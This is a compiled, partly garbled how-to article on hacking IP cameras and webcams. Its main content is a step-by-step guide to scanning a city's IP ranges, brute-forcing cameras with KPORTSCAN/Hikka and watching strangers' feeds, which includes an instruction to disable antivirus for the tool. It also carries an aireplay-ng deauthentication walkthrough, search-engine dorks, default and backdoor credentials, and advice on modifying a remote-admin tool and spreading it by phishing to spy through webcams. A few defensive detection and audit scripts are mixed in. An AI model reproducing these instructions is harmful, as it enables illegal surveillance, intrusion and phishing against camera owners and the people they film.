
Switch by reference. We get to the authorization page. We come in using the data and voila received, we get to someone else


First, let's look at what types of cameras there are:

IP cameras are cameras you can connect to via the Internet. Local cameras are cameras you cannot connect to via the Internet; they work without an Internet connection.

Now I will show you and tell you how to find the IP cameras.

To begin with, we need the necessary software for bruta, check and viewing.

First we will need to download the archive. There all the necessary software for work. If you do not want to download my archive with the collection of programs, then on the way for finding the necessary programs!


Kportscan.  -

IVMS-4200.  -

Hikka.  -

Attention! Before unpacking, turn off the antivirus and add KPORTSCAN to exceptions. So exactly on him the antivirus swears. No viruses 😈

Unpack the archive to any folder. And we meet 3 programs.

What do they make these three programs?

KPORTSCAN - Brute Camera
Hikka - IP camera check
IVMS-4200 - View IP cameras

What is Brut and Check?

Brutte (BRUTE) - the extraction of something
Check (Check) - checking something (in this case, checking using login and passwords)

At first we need to open the site.

There he is:

Enter the city there we want to hack on the cameras!

In my case, for example, it will be the Russian city "Tver"

Copy IP bands and open Kportscan. And insert the copied IP bands there.

In the list, choose "Russian Federation"

Next in "Port" write a value " 8000. "

And press the "Start" button

Attention! Before pressing the "Start" button, check with a screen like me so that you do not have any errors!


How did you verify your values ​​with my screen so that they match, boldly press the start button!

Well, now it remains to wait for the end of the check. When checking the Internet you will be loaded pretty much. So get ready for this test)

After completion, you will display the number of IP cameras found.

Close KPORTSCAN and open the file Results.txt

There will be found cameras. Copy all cameras found from file Results.txt and open the folder with the program called " Hikka. "

Open the file " Hosts. "And throw off the copied cameras there. Save and run the file" Start.Bat. "

Now we are waiting for a green string, it will mean that the camera is found!

An example of the cameras found:

As soon as Hikka found the camera, we go to install the program " IVMS-4200. "

By the way, I almost forgot when Hikka found the camera, in the PICS folder there will be pictures of the camera itself, and in the name of the chamber data.

As soon as installed the program " IVMS-4200. "Open.

If you have English, then press up "Help-> Language-> Russian

Next, open the "Device Management" tab and click on the "Add" button

We introduce any pseudonym.

Enter the address (example:

Enter a user and password

If you are confused, then check for me on the screen:


After entering the necessary data, click on the "Add" button

After the successful import of the camera, go to the "Main Curlee" tab

And we see that a new folder appeared with your pseudonym camera. We open the folder, and click on the camera 2 times with the left mouse button, or simply drag the camera a little right.

So that is all! What to do next you decide ..

Turn off video surveillance cameras in any Wi-Fi network.

Extremely useful information for those who are "shaking"; and yes, it works only while the computer keeps sending traffic, and the connection is restored as soon as you turn it off.

What you need

To begin with, you will need Kali Linux or another Linux distribution, such as Parrot Security or BlackArch, that can run Aireplay-ng. You can run them from a virtual machine, from a USB flash drive, or from a hard disk.

You will then need a Wi-Fi adapter that supports packet injection and has a monitor mode. You will need to scan the area around you to find a device that can be disconnected from the network, so that you can send packets pretending to come from the access point to which this device is connected.

Step 1. Update Kali

Before you start, make sure your system is fully updated. In Kali, the command to do this looks like this:


Make sure you have a target that you have permission to access with the Aireplay-ng tool. You can certainly scan any network you want using Kismet, but Aireplay-ng will directly perform a DDOS attack.

Step 2. Select a weapon

The first step in choosing wireless targets is passive reconnaissance of a specific Wi-Fi network. For this you can use a program called Kismet, which analyzes Wi-Fi signals passively and unnoticed. The advantage of this method is that, simply by being close to your target, you can track wireless traffic in the area and then sort through the information to find an interesting device.

An alternative to Kismet is arp-scan, which can be configured in several ways to filter information about discovered networks. Although this tool works well, it may sometimes take more work to decipher the data obtained. In this article we will use Kismet.

Step 3. Switch the Wi-Fi adapter to monitor mode

To start scanning a network with any tool, we need to put our wireless network adapter into monitor mode. We can do this by typing the following command, provided that wlan0 is the name of your wireless card. You can find out the name of your wireless card by running the ifconfig or ip a commands, which display the available network interfaces.

sudo airmon-ng start wlan0

After running this command, you can run ifconfig or ip a again to make sure your card is in monitor mode. Its name will now be something like wlan0mon.

Step 4. Point Kismet at the network

Once monitor mode is on, we can run Kismet by typing the following command:

kismet -c wlan0mon

In this command, we tell Kismet which network adapter to use; this is done with the -c flag (from the word Client). You can press Tab, then Enter, to close the console window and show the main screen.

Step 5. Using Kismet, find wireless security cameras

Now we can scroll through the list of all devices on the network and try to find something interesting. If you can't, try enabling additional options in the Preferences menu to see the source of the packets. You can access it through the "Kismet" menu.

As soon as Kismet is running, you can see the manufacturer name of any device, and from this name determine that one of the listed devices may be a security camera. Here we found a device that, according to Kismet, was made by Hangzhou. You can see that its MAC address is A4:14:37:XX:XX:XX.

Let's look in more detail at how MAC addresses are assigned. Since the first six digits and letters are assigned to a particular organization, we can quickly find the name of the company that makes such devices from the number A41437.

Taking the full name of the company (in this case, Hangzhou Hikvision Digital Technology) and entering it into Google search, we learn its product line. As luck would have it, this company makes wireless video surveillance cameras.

Now we have three pieces of our puzzle: the name and BSSID of the Wi-Fi access point the camera is connected to, the channel on which its network signal is broadcast, and the BSSID address of the camera itself. You can press Ctrl-C to close Kismet.

It is worth noting that if the camera starts recording or sending data only when it sees movement, then the hacker will not see traffic from it until the camera starts transmitting.

It can be assumed that a streaming camera connected to a DVR will stop functioning if it is disconnected from the network. With all this information at your disposal, you can use Aireplay-ng to break the connection.

Step 6. Perform a deauthentication attack

To break the connection with the device we targeted, we need to lock the wireless adapter to the channel where we see traffic. You can do this by typing the following command, assuming we want to lock the network adapter to channel 6:

airmon-ng start wlan0mon 6

Now that our card is set to the correct channel, we can send the command that disconnects the device we detected. The command we will use for this is formatted as follows:


Here is the breakdown of its components:

-0 sets the attack option to 0, the deauthentication attack, which sends deauthentication packets to the device that appear to come from the access point. The following 0 means sending a continuous stream of deauthentication packets, but you can also choose a fixed number.

-a sets the BSSID of the Wi-Fi access point to which the device is connected.

-C sets the BSSID of the device that we want to remove from the network.

The final form of our command will be as follows:

AirePlay-NG -0 0 -a XX: XX: XX: XX: XX: XX -C A4: 14: 37: XX: XX: XX Wlan0mon

As soon as this command is running, it will block a Wi-Fi connection between two devices until you stop by pressing the CTRL-C key combination.
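
Seen from the defender's side, the continuous stream of deauthentication frames described above stands out in a monitor-mode capture. The following is an added example, not part of the original article: it counts deauthentication and disassociation frames per access point and client in a sliding window over constructed frame records. The record layout, addresses, window and threshold are assumptions.

```python
"""Flag deauthentication floods in 802.11 management-frame records."""
from collections import defaultdict, deque
from dataclasses import dataclass

DEAUTH, DISASSOC, BEACON = 0x0C, 0x0A, 0x08  # 802.11 management subtypes

# Constructed addresses for the sample capture (not real devices).
AP = "aa:bb:cc:00:00:01"
CAMERA = "a4:14:37:00:00:10"
LAPTOP = "02:00:00:00:00:22"
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp, seconds
    subtype: int   # management-frame subtype
    src: str       # transmitter address (unauthenticated, so spoofable)
    dst: str       # receiver address
    bssid: str     # access point the frame claims to belong to


@dataclass(frozen=True)
class Alert:
    bssid: str
    client: str    # station being knocked off the network
    first_ts: float
    peak: int      # most deauth/disassoc frames seen inside one window


def detect_deauth_floods(frames, window=5.0, threshold=10):
    """Return one Alert per (bssid, client) pair that receives at least
    `threshold` deauth/disassoc frames within `window` seconds."""
    recent = defaultdict(deque)   # (bssid, client) -> timestamps in the window
    alerts = {}
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype not in (DEAUTH, DISASSOC):
            continue
        bssid, src, dst = f.bssid.lower(), f.src.lower(), f.dst.lower()
        # Floods are usually sent in both directions; fold them onto the client.
        client = dst if src == bssid else src
        key = (bssid, client)
        q = recent[key]
        q.append(f.ts)
        while f.ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            old = alerts.get(key)
            first = old.first_ts if old else q[0]
            peak = max(len(q), old.peak if old else 0)
            alerts[key] = Alert(bssid, client, first, peak)
    return sorted(alerts.values(), key=lambda a: a.first_ts)


def build_sample_frames():
    """Constructed capture: beacons, one ordinary deauth, then a flood."""
    frames = [Frame(float(t), BEACON, AP, BROADCAST, AP) for t in range(0, 120, 10)]
    # A laptop leaving the network sends a single deauth: normal behaviour.
    frames.append(Frame(10.0, DEAUTH, LAPTOP, AP, AP))
    # 40 frames in 2 seconds, alternating direction, aimed at the camera.
    for i in range(40):
        src, dst = (AP, CAMERA) if i % 2 == 0 else (CAMERA, AP)
        frames.append(Frame(100.0 + i * 0.05, DEAUTH, src, dst, AP))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_floods(build_sample_frames()):
        print(f"deauth flood: AP {alert.bssid} client {alert.client} "
              f"from t={alert.first_ts:.2f}s, peak {alert.peak} frames/window")
```

Where both the access point and the camera support 802.11w Protected Management Frames, spoofed deauthentication frames are rejected; a wired connection for the camera removes the exposure entirely.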


Remote access to webcams and surveillance cameras is the most visual hacking practice. It does not require special software, allowing you to get by with a browser and simple manipulations. Thousands of digital eyes worldwide become available if you know how to find their IP addresses and vulnerabilities.


This article is of a research nature. It is addressed to security specialists and those who are going to become one. Public databases were used in writing it. Neither the editors nor the author are responsible for the unethical use of any information mentioned here.

With widespread eyes

Video surveillance is used mainly for security, so do not expect cheerful pictures from the first hacked camera. Maybe you will be lucky enough to quickly find an HD broadcast from an elite brothel, but more often you will come across boring views of deserted warehouses and parking lots in VGA resolution. If there are people in the frame, they are mostly waiting in a lobby or eating in a cafe. It is more interesting to watch the operators themselves and the work of various robots.

Real and formal observation

IP cameras and webcams are often confused, although these are fundamentally different devices. A network camera, or IP camera, is a self-sufficient surveillance device. It is managed through a web interface and transmits the video stream over the network on its own. In essence, it is a microcomputer with its own Linux-based OS. An Ethernet (RJ-45) or Wi-Fi network interface lets you connect to an IP camera directly. Previously, branded client applications were used for this, but most modern cameras are managed through a browser from any device, whether a computer or a smartphone. As a rule, IP cameras are permanently and remotely available. This is what hackers take advantage of.

Robot in the library archive

A webcam is a passive device that is managed locally from the computer (via USB) or laptop (if it is built in) through an operating system driver. This driver can be of two types: universal (preinstalled in the OS and suitable for many cameras from different manufacturers) and custom-written for a specific model. The hacker's task here is different: not to connect to the webcam, but to intercept the video stream it broadcasts through the driver. A webcam has no separate IP address and no built-in web server. Therefore, hacking a webcam is always a consequence of hacking the computer it is connected to. Let's set the theory aside and practice a little.

Glasses nn-nda?

Hacking surveillance cameras

Hacking IP cameras does not mean that someone is in control of the computer from which the owner watches their video stream. It is just that now the owner is not watching alone. These are separate and fairly easy targets, though there are plenty of pitfalls along the way.


Peeping through cameras may entail administrative and criminal punishment. Usually a fine is imposed, but not everyone gets off so lightly. Matthew Anderson served a year and a half for hacking webcams using a Trojan. Someone who repeated his feat was given four years.

First, remote access to the selected camera may be supported only through some particular browser. Some need a fresh Chrome or Firefox, while others work only with old IE. Second, the video stream is broadcast to the Internet in different formats. To view it, some cameras need the VLC plugin installed, others require Flash Player, and still others will show nothing without an old version of Java or their own plug-in.

Chinese politeness

Sometimes there are nontrivial solutions. For example, a Raspberry Pi is turned into a video surveillance server with nginx and broadcasts video via RTMP.

Malinic camera

By design, an IP camera is protected from intrusion by two secrets: its IP address and its account password. In practice, IP addresses can hardly be called a secret. They are easily discovered at standard addresses, and besides, cameras respond identically to search robots' requests. For example, in the following screenshot you can see that the camera owner disabled anonymous access to it and added a CAPTCHA to prevent automated attacks. However, the direct link /INDEX.htm allows changing them without authorization.

Get access Contrary to settings

Vulnerable surveillance cameras can be found via Google or another search engine using advanced queries. For example:

Inurl: "WVHTTP-01" inurl: "ViewerFrame? mode =" inurl: "videostream.cgi" inurl: "WebCapture" inurl: "snap.jpg" inurl: "snapshot.jpg" inurl: "video.mjpg" 
We find cameras through Google

It is much more convenient to search for them through Shodan. To begin with, you can limit yourself to the simple query Netcam and then move on to more advanced ones: Netcam City: Moscow , Netcam Country: RU , Webcamxp GEO: 55.45,37.37 , Linux Upnp Avtech and others. Read more about using this search engine in the article "White Hat for Shodan".

We are looking for cameras in Shodan

Censys is also good at finding cameras. Its query language is a little more complex, but it is not hard to get the hang of it. For example, the query 80.http.get.body: "DVR Web Client" will show cameras connected to an IP video recorder, and Metadata.Manufacturer: "AXIS" will find cameras made by Axis. We have already written about how to work with Censys in the article "What can Censys know?".

We are looking for cameras in Censys

Another great search engine for the "Internet of Things" is ZoomEye. Cameras can be found with the queries Device: Webcam or Device: Media Device .

We are looking for cameras in Zoomeye

You can also search the old-fashioned way, simply scanning ranges of IP addresses for a characteristic response from a camera. You can get a list of the IP addresses of a particular city on this web service. There is also a port scanner there in case you still don't have your own.

First of all, we are interested in ports 8000, 8080 and 8888, as they are often set by default. You can find the default port number for a specific camera in its manual. The number is almost never changed. Naturally, other services can be found on any port, so the search results will have to be filtered further.


Finding out the camera's model is simple: it is usually indicated on the title page of the web interface and in its settings.

Recognize the camera model and configure it

When I spoke at the beginning of the article about managing cameras through a "branded client application", I meant programs like IVMS 4xxx, which comes with Hikvision cameras. On the developer's website you can read the Russian-language manual for the program and the cameras. If you find such a camera, it will most likely still have the factory password, and the program will provide full access to it.

With passwords on surveillance cameras, things are outright funny. Some cameras simply have no password, and authorization is missing completely. Others have a default password, which is easy to find in the camera's manual. The website published a list of the most common logins and passwords set on different camera models.

Admin / Admin, Open!

It often happens that the manufacturer has left a service entrance for service centers in the camera firmware. It remains open even after the camera owner has changed the default password. You will not read about it in the manual, but you can find it on thematic forums.

A huge problem is that many cameras use the same GoAhead web server. It has several known vulnerabilities that camera manufacturers are in no hurry to patch.

GoAhead, in particular, is subject to a stack overflow that can be triggered by a simple HTTP GET request. The situation is further complicated by the fact that Chinese manufacturers modify GoAhead in their firmware, adding new holes.

Purify, Milok!

To date, more than a million IP cameras and IP video recorders from different manufacturers allow remote access to their settings without any authorization. A Python script that automates the attack on vulnerable devices has already been posted on GitHub. The problem was discovered in early 2017 while reversing DVR firmware made by Dahua Technology. A little later it turned out that it affects more than a thousand models from different manufacturers. They simply replicated each other's mistakes. The author promised to allow time for a fix and not to disclose all the details for now, but is ready to share them privately by email with all security experts. If you have a Certified Ethical Hacker certificate or similar, you can try.

Add brightness!

The code of other firmware contains such blunders as crooked conditional branches. Such a camera grants access if you enter the wrong password or simply press the "Cancel" button several times. During our study, more than a dozen such cameras were found. So, if you are tired of going through default passwords, try clicking Cancel: there is a chance of suddenly getting access.

Mid-range and high-end cameras are equipped with swivel mounts. Having hacked one, you can change the angle and fully inspect everything around. It is especially amusing to play tug-of-war with the camera when someone else is trying to control it at the same time. In general, the attacker gets full control of the camera directly from the browser, simply by going to the right address.

Camera control

When talking about thousands of vulnerable cameras, I want to take a closer look at at least one. I propose to start with the popular manufacturer Foscam. Remember I mentioned service entrances? Foscam cameras and many others have them. In addition to the built-in Admin account, for which you are advised to set a password when the camera is first turned on, there is another account: Operator. Its default password is empty, and rarely does anyone think to change it.

Logmark as an operator and add new accounts

In addition, Foscam cameras have very recognizable addresses due to template registration. In general, it looks like where the first two XX are Latin letters and the following four are a sequence number in decimal format.

If the camera is connected to an IP video recorder, you can not only watch remotely in real time but also view previous recordings.

Watch backup

How does the motion detector

Professional surveillance cameras are equipped with an additional sensor, a motion detector, which works even in complete darkness thanks to an IR receiver. This is more interesting than constantly-on IR illumination, since it does not give the camera away and allows it to observe covertly. People always glow in the near IR range (at least living ones). Once the sensor registers movement, the controller starts recording. If the photocell signals low light, the illumination is additionally turned on, and exactly at the moment of recording, when it is too late to hide from the lens.

Cheap cameras are simpler. They have no separate motion sensor and instead compare frames from the camera itself. If the picture differs from the previous one, something has changed in the frame and it needs to be recorded. If no movement is registered, the series of frames is simply deleted. This saves space, traffic and time when later rewinding the video. Most motion detectors are configurable. You can set the trigger threshold so as not to log every movement in front of the camera, and configure additional alerts, for example, sending an SMS and the latest photo from the camera straight to a smartphone.

Customize camera motion detector

A software motion detector is greatly inferior to a hardware one and often becomes the cause of incidents. In the course of my research, I came across two cameras that continuously sent alerts and recorded gigabytes of "compromising material". All the alarms turned out to be false. The first camera was installed outside some warehouse. It was overgrown with a spider web that trembled in the wind and drove the motion detector crazy. The second camera was located in an office opposite flashing lights. In both cases, the trigger threshold was too low.
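
The frame-comparison detector and the too-low trigger threshold described above can be reproduced in a few lines. This is an added example, not code from the original article: the frame size, brightness values, thresholds and the constructed scene (a blinking light plus one passing object) are assumptions.

```python
"""Frame-differencing motion detection and the effect of the trigger threshold."""

WIDTH, HEIGHT = 16, 16
LOW_THRESHOLD = 0.005     # fires when more than 0.5% of pixels change
TUNED_THRESHOLD = 0.05    # fires when more than 5% of pixels change


def changed_fraction(prev, cur, pixel_delta=25):
    """Share of pixels whose brightness moved by more than pixel_delta."""
    changed = sum(
        1
        for row_prev, row_cur in zip(prev, cur)
        for a, b in zip(row_prev, row_cur)
        if abs(a - b) > pixel_delta
    )
    return changed / (len(cur) * len(cur[0]))


def detect_motion(frames, area_threshold, pixel_delta=25):
    """Indices of frames that differ enough from their predecessor to record."""
    return [
        i
        for i in range(1, len(frames))
        if changed_fraction(frames[i - 1], frames[i], pixel_delta) > area_threshold
    ]


def make_scene(n_frames=10):
    """Constructed grayscale footage (values 0-255):
    - static background with small deterministic sensor noise,
    - a two-pixel indicator light that blinks on every frame,
    - a 6x6 bright object that crosses the view during frames 5 to 7."""
    frames = []
    for t in range(n_frames):
        frame = [
            [100 + ((x * 7 + y * 13 + t * 3) % 5) - 2 for x in range(WIDTH)]
            for y in range(HEIGHT)
        ]
        frame[0][0] = frame[0][1] = 250 if t % 2 else 20   # blinking light
        if 5 <= t <= 7:
            left = 2 + 2 * (t - 5)                          # object moves right
            for y in range(5, 11):
                for x in range(left, left + 6):
                    frame[y][x] = 200
        frames.append(frame)
    return frames


if __name__ == "__main__":
    scene = make_scene()
    print("low threshold fires on frames:  ", detect_motion(scene, LOW_THRESHOLD))
    print("tuned threshold fires on frames:", detect_motion(scene, TUNED_THRESHOLD))
```

With the low threshold the two blinking pixels alone trigger a recording on every frame, which is the false-alarm pattern from the office camera; the tuned threshold fires only while the object appears, moves and leaves.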

Breaking webcam

Webcams that work through a universal driver are often called UVC-compatible (from USB Video Class, UVC). Hacking a UVC camera is simpler because it uses a standard and well-documented protocol. However, in any case, to access a webcam the attacker first has to gain control of the computer it is connected to.

Technically, webcams on Windows computers of any version and bitness are accessed through the camera driver, DirectDraw filters and VFW codecs. However, a novice hacker does not need to delve into all these details unless he is going to write an advanced backdoor. It is enough to take any "rat" (RAT, Remote Admin Tool) and slightly modify it. There are a great many remote administration tools today. In addition to selected backdoors from VX Heaven, there are also completely legal utilities, like Ammyy Admin, LiteManager, LuminosityLink, TeamViewer or Radmin. All that needs to be changed in them is to configure automatic acceptance of remote connection requests and hiding of the main window. The rest is up to social engineering methods.

Network girl

The modified RAT is downloaded by the victim via a phishing link or crawls onto the victim's computer by itself through the first hole it finds. On how to automate this process, see the article "Gophish: a framework for phishing". By the way, be careful: most links to "programs for hacking cameras" are themselves phishing and can lead you to download malware.

For an ordinary user, the webcam is inactive most of the time. Usually an LED warns when it is turned on, but even with such an alert, covert observation is possible. As it turned out, the webcam activity indicator can be disabled even if the power of the LED and the CMOS sensor is physically interconnected. This has already been done with the iSight webcams built into MacBooks. Researchers Brocker and Checkoway from Johns Hopkins wrote the iSeeYou utility, which runs as an ordinary user and, exploiting a vulnerability in the Cypress controller, replaces its firmware. After the victim runs iSeeYou, the attacker is able to turn on the camera without lighting its activity indicator.

Vulnerabilities are regularly found in other microcontrollers as well. A Prevx specialist assembled a whole collection of such exploits and showed examples of their use. Almost all the vulnerabilities found were 0day, but among them were well-known ones that manufacturers simply were not going to fix.

There are more and more ways to deliver exploits, and they are increasingly difficult to catch. Antiviruses often give up in the face of modified PDF files, have preset limits on checking large files and cannot check encrypted malware components. Moreover, polymorphism or constant recompilation of the payload has become the norm, so signature analysis has long since faded into the background. Planting a Trojan that opens remote access to a webcam has become exceptionally simple today. This is one of the popular amusements among trolls and script kiddies.

Turn a webcam in the observation chamber

Any webcam can be turned into a semblance of an IP camera if you install a video surveillance server on the device it is connected to. On computers, many people use the old webcamXP for this purpose, the slightly newer webcam 7 and similar programs.

There is similar software for smartphones, for example Salient Eye. This program can save video to cloud hosting, freeing up the smartphone's local memory. However, there are plenty of holes in such programs and in the OSes themselves, so cracking the webcams they manage often turns out to be no harder than cracking IP cameras with holey firmware.

Webcam 7 shows video without authorization

Smartphone as a means of observation

Recently, old smartphones and tablets are often repurposed for home video surveillance. Most often they are given Android Webcam Server, a simple application that broadcasts the video stream from the built-in camera to the Internet. It accepts requests on port 8080 and opens the control panel on a page with the self-explanatory name /remote.html . Once there, you can change the camera settings and watch the image right in the browser window (with or without sound).

Usually such smartphones show rather dull pictures. You are hardly interested in looking at a sleeping dog or a car parked near the house. However, Android Webcam Server and similar applications can be used differently. Besides rear cameras, smartphones also have front ones. Why not turn it on? Then we will see the other side of the smartphone owner's life.

Switch smartphone cameras

Protection against peeping

The first thing that comes to most people's minds after a demonstration of easy camera hacking is to cover the cameras with tape. Owners of webcams with a shutter believe that the peeping problem does not concern them, and in vain. They can also be eavesdropped on, because besides the lens, cameras have a microphone.

Developers of antiviruses and other software protection suites use the confusion in terminology to promote their products. They scare you with camera hacking statistics (which are really impressive if you include IP cameras), while they themselves offer a solution for controlling access to webcams, and a technically limited one.

The protection of IP cameras can be improved by simple means: updating the firmware, changing the password and port, disabling default accounts, and turning on IP address filtering. However, this is not enough. Many firmware versions have unfixed bugs that allow access without any authorization, for example at the standard address of the web page with LiveView or the settings panel. When you find yet another holey firmware, you just want to update it remotely!

Help update the firmware vulnerable camera
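
The hardening steps listed in this section can be checked mechanically against an asset inventory. The following is an added example, not from the original article: it audits constructed inventory records, and the record schema, camera names, model name and firmware versions are all assumptions made for illustration.

```python
"""Audit a camera inventory against the hardening steps listed above."""
import ipaddress

DEFAULT_PORTS = {8000, 8080, 8888}   # default ports named earlier on this page


def parse_version(text):
    """'1.10.0' -> (1, 10, 0); compared as strings, '1.2.9' would look newer."""
    return tuple(int(part) for part in text.split("."))


def filters_nothing(allowlist):
    """True when the allowlist is empty or contains a catch-all network."""
    nets = [ipaddress.ip_network(entry, strict=False) for entry in allowlist]
    return not nets or any(net.prefixlen == 0 for net in nets)


def audit_camera(cam, latest_firmware):
    """Return a list of finding strings for one inventory record."""
    findings = []
    latest = latest_firmware.get(cam["model"])
    if latest is None:
        findings.append("firmware: no reference version recorded for this model")
    elif parse_version(cam["firmware"]) < parse_version(latest):
        findings.append(f"firmware: {cam['firmware']} is older than {latest}")
    if cam["port"] in DEFAULT_PORTS:
        findings.append(f"port: still on default {cam['port']}")
    for acct in cam["accounts"]:
        if not acct["enabled"]:
            continue
        if acct["password_state"] in ("default", "empty"):
            findings.append(f"account {acct['name']}: {acct['password_state']} password")
        if acct["factory"] and acct["name"] != cam["admin_account"]:
            findings.append(f"account {acct['name']}: factory account still enabled")
    if filters_nothing(cam["ip_allowlist"]):
        findings.append("ip filter: no effective source-address restriction")
    return findings


def audit_inventory(inventory, latest_firmware):
    """Map camera name -> findings for every record in the inventory."""
    return {cam["name"]: audit_camera(cam, latest_firmware) for cam in inventory}


def account(name, enabled, password_state, factory=True):
    return {"name": name, "enabled": enabled,
            "password_state": password_state, "factory": factory}


# Constructed sample data: hypothetical model, versions and networks.
LATEST_FIRMWARE = {"EXAMPLE-CAM": "1.10.0"}
INVENTORY = [
    {"name": "warehouse-door", "model": "EXAMPLE-CAM", "firmware": "1.2.9",
     "port": 8000, "admin_account": "admin", "ip_allowlist": [],
     "accounts": [account("admin", True, "default"),
                  account("operator", True, "empty")]},
    {"name": "lobby", "model": "EXAMPLE-CAM", "firmware": "1.10.0",
     "port": 47000, "admin_account": "admin", "ip_allowlist": ["192.0.2.0/24"],
     "accounts": [account("admin", True, "changed"),
                  account("operator", False, "empty")]},
    {"name": "parking", "model": "EXAMPLE-CAM", "firmware": "1.10.0",
     "port": 47001, "admin_account": "admin", "ip_allowlist": ["0.0.0.0/0"],
     "accounts": [account("admin", True, "changed")]},
]

if __name__ == "__main__":
    for name, findings in audit_inventory(INVENTORY, LATEST_FIRMWARE).items():
        print(name, "OK" if not findings else "")
        for finding in findings:
            print("   -", finding)
```

As the paragraph above notes, a clean result here only covers configuration; firmware bugs that bypass authorization are not visible to this kind of check.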

Hacking a webcam is another matter. It is always the tip of the iceberg. Usually, by the time the attacker has gained access to it, he has already managed to rummage through local disks, steal the credentials of all accounts or make the computer part of a botnet.

The same Kaspersky Internet Security prevents unauthorized access only to the webcam's video stream. It does not prevent a hacker from changing its settings or turning on the microphone. The list of models it protects is officially limited to Microsoft and Logitech webcams. Therefore, the "Web Camera Protection" feature should be regarded only as a supplement.

Peeping sites

A separate problem is attacks related to how access control to the camera is implemented in browsers. Many sites offer communication services using the camera, so requests for access to it and its built-in microphone pop up in the browser ten times a day. The peculiarity here is that a site can use a script that opens a pop-under (an additional window in the background). This child window is given the permissions of the parent. When you close the main page, the microphone remains on in the background. Because of this, a scenario is possible in which the user thinks he has finished the conversation, while in fact the interlocutor (or someone else) continues to hear him.

In most browsers, the permission is stored permanently, so the next time you visit the site, it can see and hear you without warning. It is worth checking the webcam and microphone permissions for different sites more often. In Google Chrome, this can be done on the settings page chrome://settings/contentExceptions#media-stream . In old versions of Firefox, similar settings were on the about:permissions page, and in new ones they are set separately for each site when you click the (i) icon on the left of the address bar. See the Mozilla documentation for more.

How many of you have noticed how many surveillance cameras have appeared on the streets lately? Just walking from home to work recently, I counted almost half a hundred of them. And how secure are they, I asked myself .. It turns out, not very ... After spending a few days studying the issue, we prepared material on how to hack the video surveillance webcams of many modern models.

In the same way, you can hack and access other surveillance cameras, network drives (NAS), printers, web cameras and any other network equipment.

So, my task was to choose a manufacturer that, on the one hand, has long been present on the Russian market and, on the other, has not yet attracted the attention of security specialists. My choice fell on the Korean company Microdigital, which produces IP cameras.

The company's website promises us a wide range: "Over 30 models of recorders, over 150 models of the camcorder." Excellent!

The company has been on the market (including the Russian one) for more than twelve years, which means its products are widespread. It turned out that in 2011 a contract was concluded to equip more than 30 thousand Russian buses with this company's cameras.

First of all, I was interested in the N series devices: they are quite advanced, but at the same time have not yet been tested by any researchers. It's time to fix that! I chose the MDC-N4090W model, which is designed for indoor use. Detailed information about the device can be found on the manufacturer's website.


Studying the chamber

Any hardware study is best started by studying the available documentation.

Open the PDF obtained from the Microdigital website and find out that the camera has a web interface with the users root (password root) and anonymous.

Well, since we are on the company's website, let's grab the current firmware for the camera. We did not have to search for long: it is available in the appropriate section.

There is no guarantee, however, that the firmware contains all the information needed for testing, so it only makes sense to dig into it if there is no full administrator access to the device console or when you need to study the update process. Therefore, we will not spend time on it now and will return to the firmware later.

Preparing the webcam for testing

We proceed to the hardware. To do this, disassemble the device (nothing complicated, four screws around the perimeter) and take out the printed circuit board.

We see the following:

  • memory S34ML01G100TF100;
  • chip DM368Zce;
  • interfaces: four UART pins, USB, MicroSD, Ethernet.

I do not consider the pins marked BLE, since they are most likely contacts for a Bluetooth module. That does not interest us.

The S34ML01G100TF100 module is non-volatile NAND memory in a TSOP-48 package. The datasheet is easy to find with a search engine. From it we learn more about the package type (NAND08) and the storage size: 128 MB.

For further work you will need a backup of the data so that, if the camera gets "bricked", it can be returned to its original state. The PROMAN TL86 or TL866 programmer with a NAND08 → DIP48 adapter is ideal for this.

The contents of the flash memory go into our working directory. As with the firmware, we will need to return to it only if we fail to reach the administrator console.

Finding documentation (PDF) for the DM368Zce chip was not a problem either. It turns out that the chip's architecture is ARM. More could be pulled from the documentation, but we will not need it.

Let's go through the interfaces. From the documentation it is obvious that USB and MicroSD are needed mainly to connect external media to the device and use them as storage. For completeness, you can connect a Facedancer21 to the device's USB interface and use the umap2scan utility to get a list of supported devices.

Unfortunately, the camera does not support any of the devices known to us.

How about UART? Here we need to determine what each pin is responsible for and what the data transfer rate is. For this we use the Saleae Logic logic analyzer. For convenience, I connected through the wiring that links the device to the infrared lights.

We number the pins for convenience.

Before turning on the logic analyzer, we connect ground to the GND pin of the interface for the BLE connection.

Now we turn on the logic analyzer and the device itself and see what comes of it.

After the device is turned on, binary data is transmitted on pin number 3 (in the program, counting starts from zero, so the pin is numbered 2). This UART pin is responsible for data transmission (TX). Looking at the length of one bit, we get the current transfer rate: 115,200 bits per second. With the correct settings, we can even see part of the text.

Pin number 1 carries a constant voltage of 3 V, so it is intended for power. Pin number 4 is tied to the GND pin of the interface for the BLE module, so this pin is also ground. That leaves pin number 2, which is responsible for receiving bytes (RX). Now we have all the information needed to talk to the camera over UART. To connect, I will use an Arduino Uno in TTL adapter mode.

We start monitoring the UART port and get the following.

When the device starts, the U-Boot bootloader is loaded first. Unfortunately, at the boot stage the TX pin is disabled in the camera settings, so we can only observe debug output. After some time the main system boots and lets us enter a login and password to access the administrator console. The pair root / root (the same one used for the web admin panel and listed in the documentation) fit perfectly.

Having obtained a console, we can explore all running services. But do not forget that we have one more unexplored interface: Ethernet. To study it, we need to prepare a traffic monitoring setup. Moreover, it is important to capture the very first network connection.

We must start intercepting traffic right away, because some devices start downloading updates when first connected. There is no guarantee that such communications can be intercepted on later connections.

To intercept traffic, I will use the LAN Tap Pro device.

We do not, however, detect any activity related to updates. With that, reconnaissance is over, and we are fully prepared to search for vulnerabilities!

Network part

We scan the ports with the Nmap utility and get a list of open ports.

Let's briefly go through the services available to us.


When connecting, the service requests a login and password. Anonymous login is disabled. But then the root / root option worked!

Now we can enter any directory, and we have a convenient way to transfer files to the remote host.


When connecting via Telnet, the username and password of a real account are again required, and the root / root pair fits here too. Note that we no longer need the UART console, since everything can be done remotely over Telnet.


To connect to RTSP, you again need to log in as root / root. The connection link takes the form rtsp://root:root@<camera-IP>:554/Primary.


After examining how the camera's web server is built, I drew up this scheme.

The server contains PHP scripts and CGI applications that communicate with executable files from the directory /usr/local/ipsca/ (mostly with MainProc). An SQLite 3 database is used to store all settings.

We will start looking for vulnerabilities with it. The database is stored in /usr/local/ipsca/mipsca.db. It holds everything, from system logs to the settings for automatically uploading camera recordings to a remote server. The database structure is visible in the screenshot below.

The User table caught my attention. It is responsible for user data: login, password, privileges.

